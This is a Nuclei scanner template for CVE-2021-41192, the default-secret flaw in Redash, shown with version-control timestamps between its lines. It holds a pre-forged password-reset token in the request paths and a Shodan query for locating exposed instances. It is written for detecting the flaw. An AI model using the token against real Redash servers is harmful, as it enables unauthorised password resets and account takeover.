nuclei-templates/cves/2021/CVE-2021-41192.yaml

40 lines
1.3 KiB
YAML
Raw Normal View History

2022-02-25 16:17:47 +00:00
id: CVE-2021-41192
info:
2022-02-25 19:10:32 +00:00
name: Redash Setup Configuration - Default secrets
2022-02-25 16:17:47 +00:00
author: bananabr
severity: medium
2022-02-25 16:17:47 +00:00
description: If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
reference:
- https://hackerone.com/reports/1380121
- https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
- https://nvd.nist.gov/vuln/detail/CVE-2021-41192
metadata:
2022-02-26 20:57:18 +00:00
shodan-query: http.favicon.hash:698624197
2022-02-25 16:17:47 +00:00
tags: cve,cve2021,redash,auth-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
cvss-score: 6.50
cve-id: CVE-2021-41192
cwe-id: CWE-1188
2022-02-25 16:17:47 +00:00
requests:
- method: GET
path:
2022-02-25 19:19:01 +00:00
- "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
- "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
2022-02-26 20:57:18 +00:00
2022-02-25 19:10:32 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
2022-02-26 20:57:18 +00:00
part: body
2022-02-25 19:10:32 +00:00
words:
2022-02-26 20:57:18 +00:00
- "Enter your new password:"
- "redash"
condition: and
2022-02-25 19:10:32 +00:00
- type: status
status:
2022-02-25 19:19:01 +00:00
- 200